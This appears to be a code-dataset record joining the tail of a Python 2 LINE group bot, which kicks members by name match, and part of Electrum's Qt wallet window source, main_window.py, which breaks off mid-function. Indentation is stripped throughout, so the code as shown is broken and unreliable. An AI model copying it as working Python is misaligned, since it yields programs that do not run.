for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
if target not in admin:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except Exception as e:
cl.sendText(msg.to,str(e))
cl.inviteIntoGroup(msg.to, targets)
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot:restart"]:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
#thread2 = threading.Thread(target=nameUpdate)
#thread2.daemon = True
#thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
